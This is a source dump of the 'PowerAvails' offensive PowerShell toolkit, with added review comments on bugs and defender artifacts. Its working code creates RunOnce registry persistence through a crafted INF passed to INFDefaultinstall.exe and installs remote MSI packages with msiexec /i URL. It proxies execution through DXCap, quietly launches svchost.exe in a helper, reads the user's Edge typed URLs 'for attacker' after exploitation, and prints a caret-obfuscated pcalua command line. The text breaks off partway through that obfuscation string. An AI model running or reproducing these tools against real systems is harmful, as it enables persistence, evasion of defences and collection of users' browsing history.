├── INF-Inject ├── INFDefaultinstall.exe ├── INFScript.inf ├── invoke-Backdoors.ps1 └── syssetup.dll ├── Invoke-Parent.ps1 ├── MSIRemoteExecution ├── install-Package ├── invoke-MSIRemoteExecution.ps1 └── msiexec.exe ├── PSBrowser ├── Get-TokenMSEdge.ps1 └── PNG │ └── Token.PNG ├── README.md └── invoke-Confusion.ps1 /INF-Inject/INFDefaultinstall.exe: -------------------------------------------------------------------------------- 1 | INFDefaultinstall.exe C:\test 2 | *\ Needs Administrator 3 | -------------------------------------------------------------------------------- /INF-Inject/INFScript.inf: -------------------------------------------------------------------------------- 1 | [STRINGS] 2 | KEY_RUNONCE = "Software\Microsoft\Windows\CurrentVersion\RunOnce" 3 | KEY_REMOVE = "Software\Microsoft\Windows\CurrentVersion\Uninstall" 4 | ADD_1 = "Powershell_Execute" 5 | ;; Locasised strings 6 | ;;; Author Mat harr0ey 7 | ;;; English INFScript Inject 8 | ADD_3 = "PowerShell Execution" 9 | ADD_4 = "PowerShell:>" 10 | [version] 11 | signature="$CHICAGO$" 12 | 13 | [DefaultInstall] 14 | AddReg = Titre.Reg 15 | 16 | [Titre.Reg] 17 | HKLM,%KEY_RUNONCE%\setup," "%ADD_1% 18 | HKLM,%KEY_RUNONCE%\setup,"___________________________" 19 | HKLM,%KEY_RUNONCE%\setup,%ADD_3% 20 | HKLM,%KEY_RUNONCE%\setup,"" 21 | HKLM,%KEY_RUNONCE%\setup,%ADD_4%,0,"notepad.exe" 22 | [Question] 23 | Prompt = %NEW_1% 24 | ButtonType = YESNO 25 | Title = %ADD_1% 26 | 27 | -------------------------------------------------------------------------------- /INF-Inject/invoke-Backdoors.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Author ( Matt harr0ey ) 3 | .Lisence BSD3 4 | .Required Dependencies: None 5 | .Optional Dependencies: None 6 | 7 | 8 | .Topic 9 | Launch Backdoors INFScript 10 | 11 | .Synopsis 12 | invoke-Backdoors INFScript Inject 13 | 14 | .Description 15 | You Can Use This Script Powershell For Execution INFScript Backdoors With Also Install 
Files .INF Script Using INFDefaultinstall.exe

.Note
This invoke-Backdoors Needs Administrator

.Example
PS:> invoke-Backdoors -Command 'HKLM,%KEY_RUNONCE%\setup,%ADD_4%,0,"calc.exe"'
[STRINGS]
KEY_RUNONCE = "Software\Microsoft\Windows\CurrentVersion\RunOnce"
KEY_REMOVE = "Software\Microsoft\Windows\CurrentVersion\Uninstall"
ADD_1 = "Powershell_Execute"
;; Localised strings
;;; English
ADD_3 = "PowerShell Execution"
ADD_4 = "PowerShell:>"
[version]
signature="$CHICAGO$"

[DefaultInstall]
AddReg = Titre.Reg

[Titre.Reg]
HKLM,%KEY_RUNONCE%\setup," "%ADD_1%
HKLM,%KEY_RUNONCE%\setup,"___________________________"
HKLM,%KEY_RUNONCE%\setup,%ADD_3%
HKLM,%KEY_RUNONCE%\setup,""
HKLM,%KEY_RUNONCE%\setup,%ADD_4%,0,"calc.exe"
[Question]
Prompt = %NEW_1%
ButtonType = YESNO
Title = %ADD_1%

.Review
What this does: builds an INF at C:\INFInjection.INF whose [DefaultInstall]
AddReg section writes values under HKLM\...\CurrentVersion\RunOnce\setup, with
the caller's -Command string inserted verbatim as one of those registry lines,
and then hands the file to INFDefaultinstall.exe (a signed Windows binary) so
that it performs the registry writes. Net effect is a RunOnce persistence
entry created through a trusted installer binary (ATT&CK T1547.001 via
T1218). HKLM writes are why administrator rights are needed.

Defects visible in the INF template and the function below:
  - [Question] refers to %NEW_1%, which is never defined in [STRINGS].
  - KEY_REMOVE ($x03) is written twice, once in place of $x04's slot
    (see $INFScript3 / $INFScript4); $x04 is then written as $INFScript5.
  - The file is written with Add-Content and never truncated or removed, so
    every run appends a complete second copy of the INF to the same file and
    the artifact stays on disk afterwards.
  - `if ($like = $Command)` is an assignment, not a comparison.

Artifacts for defenders: C:\INFInjection.INF on disk; INFDefaultinstall.exe
spawned by powershell.exe with a .inf argument; new value(s) under
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce.

.References
rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 C:\INFPS.inf


.ReferencesBlog
https://github.com/homjxi0e/APT


#>

function invoke-Backdoors {

    [CmdletBinding()]

    param (

        # The INF registry line to embed. Copied verbatim into the file with
        # no validation; whatever the caller passes becomes a line of the INF.
        [Parameter(Mandatory=$true)]
        [Parameter(Position = 0, ParameterSetName = 'Command')]
        [String]$Command
    )

    # NOTE: '=' assigns rather than compares. The branch runs whenever
    # $Command is non-empty, which Mandatory already guarantees.
    if ($like = $Command) {

        # One INF line per variable; they are appended to the file, in order,
        # below. Leading/trailing spaces are part of the literals.
        $x01 = ' [STRINGS] '
        $x02 = ' KEY_RUNONCE = "Software\Microsoft\Windows\CurrentVersion\RunOnce" '
        $x03 = ' KEY_REMOVE = "Software\Microsoft\Windows\CurrentVersion\Uninstall" '
        $x04 = ' ADD_1 = "Powershell_Execute" '
        $x05 = ' ;; Locasised strings '
        $x06 = ' ;;; English '
        $x07 = ' ADD_3 = "PowerShell Execution" '
        $x08 = ' ADD_4 = "PowerShell:>" '
        $x09 = ' [version] '
        # Single-quoted, so $CHICAGO$ is literal (it is the INF signature token).
        $x10 = ' signature="$CHICAGO$" '

        $x11 = ' [DefaultInstall] '
        $x12 = ' AddReg = Titre.Reg '

        $x13 = ' [Titre.Reg] '
        $x14 = ' HKLM,%KEY_RUNONCE%\setup," "%ADD_1% '
        $x15 = ' HKLM,%KEY_RUNONCE%\setup,"___________________________" '
        $x16 = ' HKLM,%KEY_RUNONCE%\setup,%ADD_3% '
        $x17 = ' HKLM,%KEY_RUNONCE%\setup,"" '
        # Caller-controlled line goes here, unescaped (double-quoted: $command
        # expands; PowerShell variable names are case-insensitive).
        $x18 = " $command "
        $x19 = ' [Question] '
        # %NEW_1% has no definition in [STRINGS] above.
        $x20 = ' Prompt = %NEW_1% '
        $x21 = ' ButtonType = YESNO '
        $x22 = ' Title = %ADD_1% '

        # Add-Content appends: nothing clears C:\INFInjection.INF first, so a
        # re-run produces a file with two copies of the script. -PassThru
        # returns the written line into $INFScriptN, which is never used.
        $INFScript1 = Add-Content -Value $x01 -PassThru C:\INFInjection.INF
        $INFScript2 = Add-Content -Value $x02 -PassThru C:\INFInjection.INF
        $INFScript3 = Add-Content -Value $x03 -PassThru C:\INFInjection.INF
        # Writes $x03 a second time (duplicate KEY_REMOVE line in the INF).
        $INFScript4 = Add-Content -Value $x03 -PassThru C:\INFInjection.INF


        $INFScript5 = Add-Content -Value $x04 -PassThru C:\INFInjection.INF
        $INFScript6 = Add-Content -Value $x05 -PassThru C:\INFInjection.INF
        $INFScript7 = Add-Content -Value $x06 -PassThru C:\INFInjection.INF

        $INFScript8 = Add-Content -Value $x07 -PassThru C:\INFInjection.INF
        $INFScript9 = Add-Content -Value $x08 -PassThru C:\INFInjection.INF
        $INFScript10 = Add-Content -Value $x09 -PassThru C:\INFInjection.INF

        $INFScript11 = Add-Content -Value $x10 -PassThru C:\INFInjection.INF
        $INFScript12 = Add-Content -Value $x11 -PassThru C:\INFInjection.INF

        $INFScript13 = Add-Content -Value $x12 -PassThru C:\INFInjection.INF

        $INFScript14 = Add-Content -Value $x13 -PassThru C:\INFInjection.INF
        $INFScript15 = Add-Content -Value $x14 -PassThru C:\INFInjection.INF
        $INFScript16 = Add-Content -Value $x15 -PassThru C:\INFInjection.INF
        $INFScript17 = Add-Content -Value $x16 -PassThru C:\INFInjection.INF
        $INFScript18 = Add-Content -Value $x17 -PassThru C:\INFInjection.INF
        $INFScript19 = Add-Content -Value $x18 -PassThru C:\INFInjection.INF
        $INFScript20 = Add-Content -Value $x19 -PassThru C:\INFInjection.INF
        $INFScript21 = Add-Content -Value $x20 -PassThru C:\INFInjection.INF
        $INFScript23 = Add-Content -Value $x21 -PassThru C:\INFInjection.INF
        $INFScript24 = 
Add-Content -Value $x22 -PassThru C:\INFInjection.INF
    }

    # Hands the generated INF to InfDefaultInstall.exe, which processes
    # [DefaultInstall] and performs the HKLM RunOnce AddReg writes.
    # The catch only fires when PowerShell itself raises (for example the
    # executable cannot be resolved). A UAC refusal or a non-zero exit code
    # from the native process does not throw, so "This Needs Admin" is not a
    # reliable signal; $LASTEXITCODE would have to be checked for that.
    # The INF file is left on disk afterwards.
    try{
        INFDefaultinstall.exe C:\INFInjection.INF
    } catch {
        throw "This Needs Admin"
    }

}
#
--------------------------------------------------------------------------------
/INF-Inject/syssetup.dll:
--------------------------------------------------------------------------------
syssetup,SetupInfObjectInstallAction DefaultInstall 128 C:\INFPS.inf
*\ Needs Administrator
--------------------------------------------------------------------------------
/Invoke-Parent.ps1:
--------------------------------------------------------------------------------
<#


.Author Matt harr0ey @harr0ey
.Optional Dependencies : None
.Required Dependencies : None




.Description
This is powershell parent is a system operating to take info of parent in process ShellExecute alongside to display the clarification both who is opening this process with comprehension of the operation using WMIObject

.Review
What the code actually does: starts the process named by -ProcessName, then
looks up a Win32_Process instance of that image name through WMI and
reports its OWNER (GetOwner / GetOwnerSid). No parent process is resolved;
ParentProcessId is never read. Before doing so it also loads the
Microsoft.JScript engine and evaluates JScript that uses WScript.Shell to
run "svchost.exe" - three times - which is unrelated to the lookup and is
not mentioned anywhere in this help. The function is defined as
invoke-Paraent (sic), so the examples below, which call invoke-Parent, do
not work as written.

Encoded Code Powershell Load Reflection Assembly
(UTF-16LE base64 of the LoadWithPartialName('Microsoft.JScript') call used in the body)
WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQ
AGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAnAE0AaQBjAHIAbwBzAG8AZgB0AC4ASgBTAGMAcgBpAHAAdAAnACkA
[void] [Microsoft.JScript.Eval]::JScriptEvaluate($Void,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())

PS C:\> invoke-Parent -ProcessName powershell.exe


UserName Domain_LOP SID
-------- ---------- ---
Matt DESKTOP-F5LB1H0 S-1-5-21-3470420603-3041439269-2463402797-1001


PS C:\> invoke-Parent -ProcessName calc.exe


UserName Domain_LOP SID
-------- ---------- ---
Matt DESKTOP-F5LB1H0 S-1-5-21-3470420603-3041439269-2463402797-1001


PS C:\>

#>

function invoke-Paraent {
    # NOTE: name is misspelled relative to the documented invoke-Parent.

    [CmdletBinding()]

    param(

        # Image name (e.g. "calc.exe"). It is both launched and used, unescaped,
        # inside a WQL filter below.
        [Parameter(Mandatory=$true)]
        [Parameter(Position = 0, ParameterSetName = 'ProcessName')]
        [string]$ProcessName

    )

    if($ProcessName) {
        # Undocumented side effect: load the JScript engine and have
        # WScript.Shell run "svchost.exe" (resolved via the normal search
        # path) three times. Each evaluation is a separate process creation
        # attributed to this PowerShell host. The assembly name is spelled
        # 'JSCript'; assembly-name matching is presumably case-insensitive,
        # so it still loads - confirm on the target.
        [void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.JSCript')
        $Void = 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("svchost.exe")'
        [void] [Microsoft.JScript.Eval]::JScriptEvaluate($Void,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())
        [void] [Microsoft.JScript.Eval]::JScriptEvaluate($Void,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())
        [void] [Microsoft.JScript.Eval]::JScriptEvaluate($Void,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())

        # Bare type literals chained as casts; appear to be no-ops that emit
        # nothing. TODO confirm they add no pipeline output.
        [void] [void] [void] [void] [void] [void] [void] [void] [void] [void]

        [void] [void] [void] [void]

        [void] [void]

        # Unused copy of the parameter.
        $0009 = $ProcessName

        # 'start' is Start-Process: this LAUNCHES the named program, then prints
        # its (empty) output. The function is not a passive inspector.
        Write-Host -BackgroundColor DarkCyan ("$(start $ProcessName)")

        # WQL filter built by string interpolation: a single quote in
        # $ProcessName changes the query (WQL injection). Sorting by
        # CreationDate descending and taking -Last 1 selects the OLDEST
        # instance of that image name, not the one just started. If no
        # instance is found $obj is $null and the method calls below fail.
        $obj = Get-WmiObject -Class Win32_Process -Filter "Name = '$ProcessName'"| Sort-Object -Property CreationDate -Descending | Select-Object -Last 1


        $topic2 = ($obj.GetOwner().Domain)
        $topic1 = ($obj.GetOwner().User)
        $topic3 = ($obj.GetOwnerSid().Sid)
        # ForEach-Object with no pipeline input; relies on the block running
        # once regardless - TODO confirm. A plain [PSCustomObject]@{...}
        # expression would be the unambiguous form of the same output.
        %{[PSCustomObject]@{UserName=$topic1 ;Domain_LOP=$topic2 ;SID=$topic3}}
        #PSCustomOBject to statement creation


    }
}
--------------------------------------------------------------------------------
/MSIRemoteExecution/install-Package:
--------------------------------------------------------------------------------
install-Package C:\test.msi
--------------------------------------------------------------------------------
/MSIRemoteExecution/invoke-MSIRemoteExecution.ps1:
--------------------------------------------------------------------------------
<#
.Author ( Matt harr0ey )

.Licence BSD3
.Required Dependencies: None
.Optional Dependencies: None

.Description
Windows Package installer MSI Remote Execution Via Powershell With 
msiexec.exe

.Example
PS:> invoke-MSIExecution -Local C:\Test.msi

.Example
PS:> invoke-MSIExecutionRemote -URL

.Review
The functions defined below are invoke-MSIExecutionRemote and
invoke-MSIExecutionLocal; the first example names invoke-MSIExecution, which
does not exist here. Both are thin wrappers around ordinary package
installation: nothing bypasses msiexec's own logging or policy, and no hash
or signature check is made on the package. The observable for the remote
variant is an msiexec.exe process whose "/i" argument is a URL
(ATT&CK T1218.007), spawned by powershell.exe.
#>
function invoke-MSIExecutionRemote {

    [CmdletBinding()]

    param (

        [Parameter(Mandatory=$true)]

        [Parameter(Position = 0, ParameterSetName = 'URL')]

        # $Local is a second, untyped, attribute-less parameter that the body
        # never reads; it looks copy-pasted from the Local variant.
        [String]$URL,$Local
    )

    # NOTE: '=' assigns. Runs whenever $URL is non-empty (always, it is Mandatory).
    if ($like = $URL) {

        # Unused copy of the parameter.
        $DragURL = "$URL"
        # msiexec fetches and installs the package itself. Nothing is
        # captured into $RemoreMSI (msiexec writes no stdout here) and the exit
        # code is never checked. Whether PowerShell waits for msiexec to finish
        # is not verified here (it is a GUI-subsystem executable).
        $RemoreMSI = msiexec.exe /i $URL
    }

}

function invoke-MSIExecutionLocal {


    [CmdletBinding()]

    param (

        [Parameter(Mandatory=$true)]

        # Parameter set is still called 'URL' although this takes a local path.
        [Parameter(Position = 0, ParameterSetName = 'URL')]

        [String]$Local
    )

    # NOTE: '=' assigns. Runs whenever $Local is non-empty.
    if ($like = $Local) {
        # Relies on the PackageManagement msi provider accepting a bare .msi
        # path - confirm on the target. Result object is captured but unused.
        $LocalExecution = Install-Package $Local
    }

}
--------------------------------------------------------------------------------
/MSIRemoteExecution/msiexec.exe:
--------------------------------------------------------------------------------
&- msiexec.exe /passive /i C:\testing.msi /norestart
&- msiexec.exe /i C:\testing.msi /norestart
--------------------------------------------------------------------------------
/PSBrowser/Get-TokenMSEdge.ps1:
--------------------------------------------------------------------------------
<#
.Author Matt Homjxi0e @matthomjxiex02x
.License PS Not More
.Optional Dependencies: None
.Required Dependencies: None


.Synopsis
Sniffer Every URLS the Users Browser Microsoft Edge From location Storage in Registry drag URLS For Attacker
Note: This Operation Valid For Post Exploitation Empire =!-!

.Review
Despite "Token" in the name, this reads the TypedURLs value set of the
legacy (EdgeHTML) Microsoft Edge AppContainer registry store under HKCU -
i.e. the URLs the user typed into the address bar - not any credential,
cookie or token. It runs in the current user's context and needs no
elevation. Where that key is absent (a browser build that keeps its history
elsewhere - verify), Get-ItemProperty raises a non-terminating error and
nothing is returned. The example below passes -CommandEx twice, which
PowerShell rejects as a duplicate parameter; one occurrence is enough.

.Example
PS:> Get-TokenMsftEdge -CommandEx NULL -CommandEx NULL
.Result
url1 :any login
url2 : any login
url3 : any login
url4 : any login
url5 : any login
url6 : any login
url9 : any login
url10 :
url11 :
url12 :
url13 :
url14 :
url15 :
url16 :
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\C
lasses\Local Settings\Software\Microsoft\Windows\CurrentVersion\
AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Micro
softEdge\TypedURLs
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\C
lasses\Local Settings\Software\Microsoft\Windows\CurrentVersion\
AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Micro
softEdge
PSChildName : TypedURLs
PSDrive : HKCU
PSProvider : Microsoft.PowerShell.Core\Registry
end Everything
#>

function Get-TokenMsftEdge {

    # SupportsPaging advertises -First/-Skip/-IncludeTotalCount, but
    # $PSCmdlet.PagingParameters is never consulted, so they are ignored.
    [CmdletBinding(SupportsPaging = $true)]
    param(
        # $CommandEx is required but its value is never used; $pa is an
        # extra untyped parameter that is likewise unused.
        [Parameter(Mandatory=$True,Position=0)]

        [parameter(Mandatory=$true,ParameterSetName="NULL")]

        [System.String]$CommandEx,$pa
    )

    # Assignment to $null (value discarded); the condition evaluates the
    # assigned value, so this behaves like `if ($CommandEx)` - verify. Since
    # the parameter is Mandatory the branch always runs.
    if ($null = $CommandEx) {

        $SnifferEdgedrag = Join-Path -Path "HKCU:\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\" -ChildPath TypedURLs

        # Emits the TypedURLs property bag (url1..urlN plus PS* metadata).
        Get-ItemProperty -Path $SnifferEdgedrag
        # Out-String with no pipeline input; does not affect the line above.
        ( Out-String )

    }

}
--------------------------------------------------------------------------------
/PSBrowser/PNG/Token.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/homjxi0e/PowerAvails/ebdd4102a46d3ee288139fe416beb1977eb1e3a8/PSBrowser/PNG/Token.PNG
--------------------------------------------------------------------------------
/README.md:
-------------------------------------------------------------------------------- 1 | # PowerAvails Powershell 2 | 3 | ![132131312](https://user-images.githubusercontent.com/25440152/50379654-e37c3400-0657-11e9-8364-b0f9f88fe589.PNG) 4 | 5 | 6 | * invoke-ConfusionJS -Command 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")' 7 | * invoke-Confusions-LLMTCOMCLSID -CLSID 8 | * invoke-SCTExecution -SCT 9 | * invoke-DLLLaunchApplication -CML !sought 10 | * invoke-lateralmovement -Command !sought 11 | * invoke-VBNET -CMLShell !sought 12 | * invoke-XMLTransform -XSL URL -XML URL 13 | * invoke-OpenWith -CML notepad.exe 14 | * invoke-invoke-DxCap -CML notepad.exe 15 | * invoke-ApplicationShellExecute -CML !sought 16 | * invoke-ADinfo -Type List 17 | * Get-TokenMsftEdge -Type List 18 | * invoke-URLPSShell -URI http.raw 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /invoke-Confusion.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | 3 | 4 | ####################################################################################### 5 | ####################################################################################### 6 | ## _ _ _____ __ _ ## 7 | ## (_) | | / __ \ / _| (_) ## 8 | ## _ _ ____ _____ | | _____ ______| / \/ ___ _ __ | |_ _ _ ___ _ ___ _ __ ## 9 | ## | | '_ \ \ / / _ \| |/ / _ \______| | / _ \| '_ \| _| | | / __| |/ _ \| '_ \ ## 10 | ## | | | | \ V / (_) | < __/ | \__/\ (_) | | | | | | |_| \__ \ | (_) | | | | ## 11 | ## |_|_| |_|\_/ \___/|_|\_\___| \____/\___/|_| |_|_| \__,_|___/_|\___/|_| |_| ## 12 | ####################################################################################### 13 | ####################################################################################### 14 | ########### ########### 15 | ########### ########### 16 | ########### ########### 17 | ########### ########### 18 | ########### ########### 19 | 
########### ########### 20 | ########### ########### 21 | ########### ########### 22 | ########### ########### 23 | ########### ########### 24 | ########### ########### 25 | ########### ########### 26 | ########### ########### 27 | ########### ########### 28 | ########### ########### 29 | ########### ########### 30 | ########### ########### 31 | ########### 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | .Author ( @harr0ey ) 44 | .License not yet 45 | .Required Dependencies: None 46 | .Optional Dependencies: None 47 | 48 | 49 | .Description 50 | Adaptive confusion Powershell about attacking places secure from some products Microsoft with of some of the executive methods of the system 51 | 52 | .Broadly 53 | This make your edge progressively advanced About Attacks Powershell 54 | 55 | 56 | .Example 57 | PS:> invoke-ConfusionJS -Command 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")' 58 | 59 | 60 | .Example 61 | PS:> invoke-Confusions-LLMTCOMCLSID -CLSID 62 | 63 | 64 | .Example 65 | PS:> Invoke-COMScriptlet -SCT URL.SCT 66 | 67 | 68 | .Example 69 | PS:> invoke-DLLLaunchApplication -CML calc.exe 70 | 71 | 72 | .Example 73 | PS:> invoke-lateralmovement -Command calc.exe 74 | 75 | .Example 76 | PS:> invoke-VBNET -CMLShell calc.exe 77 | 78 | 79 | .Example 80 | PS:> invoke-XMLTransform -XSL URL -XML URL 81 | 82 | 83 | .Example 84 | PS:> invoke-DxCap -CML calc.exe 85 | 86 | 87 | .Example 88 | PS:> invoke-OpenWith -CML notepad.exe 89 | 90 | 91 | .Example 92 | PS:> invoke-ApplicationShellExecute -CML calc.exe 93 | 94 | 95 | .Example 96 | PS:> invoke-URLPSShell -URI URL! 97 | 98 | .Example 99 | PS:> 100 | 101 | 102 | 103 | #> 104 | 105 | $obj = ''' 106 | 107 | Author Mat harr0ey @harr0ey 108 | Thank you for visiting us 109 | ! Exit! 
110 | ''' 111 | [void] [System.Reflection.Assembly]::LoadWithPartialName("Microsoft.VisualBasic") 112 | 113 | [Microsoft.VisualBasic.Interaction]::MsgBox("$obj.", "OKOnly,SystemModal,Information", "Attention Powershell") 114 | 115 | Write-Host -ForegroundColor Green " 116 | _ _ _____ __ _ 117 | (_) | | / __ \ / _| (_) 118 | _ _ ____ _____ | | _____ ______| / \/ ___ _ __ | |_ _ _ ___ _ ___ _ __ 119 | | | '_ \ \ / / _ \| |/ / _ \______| | / _ \| '_ \| _| | | / __| |/ _ \| '_ \ 120 | | | | | \ V / (_) | < __/ | \__/\ (_) | | | | | | |_| \__ \ | (_) | | | | 121 | |_|_| |_|\_/ \___/|_|\_\___| \____/\___/|_| |_|_| \__,_|___/_|\___/|_| |_| 122 | --------------------------------------------------------------------------------- 123 | |===============| 124 | |= PowerAvails =| 125 | |= =| 126 | |=======================> https://github.com/homjxi0e/PowerAvails 127 | 128 | 129 | 1 invoke-ConfusionJS -Command 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")' 130 | 2 invoke-Confusions-LLMTCOMCLSID -CLSID 131 | 3 Invoke-COMScriptlet -SCT 132 | 4 invoke-DLLLaunchApplication -CML calc.exe 133 | 5 invoke-lateralmovement -Command calc.exe 134 | 6 invoke-VBNET -CMLShell calc.exe 135 | 7 invoke-XMLTransform -XSL URL -XML URL 136 | 8 invoke-OpenWith -CML notepad.exe 137 | 9 invoke-DxCap -CML notepad.exe 138 | 10 invoke-ApplicationShellExecute -CML calc.exe 139 | 11 invoke-ADinfo -Type List 140 | 12 Get-TokenMsftEdge -Type List 141 | 13 invoke-URLPSShell -URI URL! 
"
# "Press Enter" pause after the banner/menu; the value read is never used.
$obj_ = Read-Host -Prompt Enter


function invoke-DxCap {

    <#


    .Author ( @harr0ey )
    .License BSD3
    .Required Dependencies: None
    .Optional Dependencies: None



    .Broadly
    Tool Command line Execution Via DXcap.exe Use DXCap.exe To Run CML

    .Review
    Proxy execution through DXCap.exe (DirectX graphics capture tool). It is
    part of the Visual Studio / Windows SDK graphics tools rather than a stock
    Windows component, and is invoked by bare name, so it must be present on
    PATH on the target - verify. "-c <program>" makes DXCap launch <program>
    as its capture target, which is the proxy-execution trick used here
    (documented in LOLBAS; ATT&CK T1218). Observable: a DXCap.exe child of
    powershell.exe with "-c" on its command line.



    .Example
    PS:> invoke-DxCap -CML notepad.exe

    #>

    [CmdletBinding()]

    param (

        [Parameter(Mandatory=$true)]
        [Parameter(Position = 0, ParameterSetName = 'CML')]
        [String]$CML

    )


    # NOTE: '=' assigns. Runs whenever $CML is non-empty (always, it is Mandatory).
    if ($like = $CML) {

        # Unused; name copy-pasted from invoke-OpenWith.
        $ADDValueOpenWith = $CML
        DXcap.exe -c $CML


    }
}


function invoke-GenerateObf {

    <#

    .Author Matt harr0ey @harr0ey
    .License BSD3
    .Required Dependencies : None
    .Optional Dependencies : None

    .Broadly Generate Strings of Obfuscation Code inside CMD Prompt

    .Review
    Only PRINTS (Write-Host) a fixed, caret-obfuscated cmd.exe command line:
    the literal that follows decodes to a "pcalua -n -a..." invocation padded
    with long runs of 'a'/'n' characters around "calc". cmd.exe strips '^' as
    its escape character, so the carets only defeat naive string matching of
    the command line. $Type is tested but otherwise ignored, and Write-Host
    returns nothing, so $Obj is always $null. Nothing is executed here.


    .Exmaple
    PS:> invoke-GenerateObf -Type strings

    #>


    [CmdletBinding()]

    param (

        # Two Position-0 bindings for two parameter sets ('Type' and
        # 'Strings') on the same parameter; both resolve to the same string.
        [Parameter(Mandatory=$true)]
        [Parameter(Position = 0, ParameterSetName = 'Type')]
        [Parameter(Position = 0, ParameterSetName = 'Strings')]
        [String]
        $Type


    )

    If($Type) {

        try{
            $Obj = Write-Host "
p^c^a^l^u^a^ ^-^n^ 
^-^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a
